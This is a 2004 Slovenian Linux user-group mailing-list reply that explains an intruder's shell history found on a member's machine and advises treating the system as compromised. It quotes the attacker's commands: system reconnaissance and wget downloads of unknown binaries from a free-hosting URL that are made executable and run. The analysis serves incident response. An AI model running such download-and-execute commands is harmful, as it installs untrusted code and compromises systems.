[LUGOS] wget

Andrej Mršek andrej.mrsek at volja.net
Tue Feb 10 10:40:03 CET 2004

klik wrote:

>Ali morda kdo ve, kaj mi je nekdo počel v računalniku
>uname -a
>cd /tmp
>ls
>cat /etc/*rel*

Do sem je malce pogledal kakšen sistem imaš

>wget freeweb.siol.net/stuclb99/d
>chmod +x d
>./d

iz tega naslova (freeweb.siol.net) je potegnil program z imenom d, mu
postavil x bit (torej gre za program) in ga pognal.

>wget freeweb.siol.net/stuclb99/x
>chmod +x x
>./x
>./x

Nato je podobno napravil še s programom x

Kaj za eni programi so x in d pa ve samo lastnik (predvidevam da je
struclb99 kak username pri Siol-u), lahko da so kakšna root-kit tools
ali pa kaj drugega. Lahko smatraš, da je sistem kompromitiran in ukrepaš.

Lep pozdrav, Andrej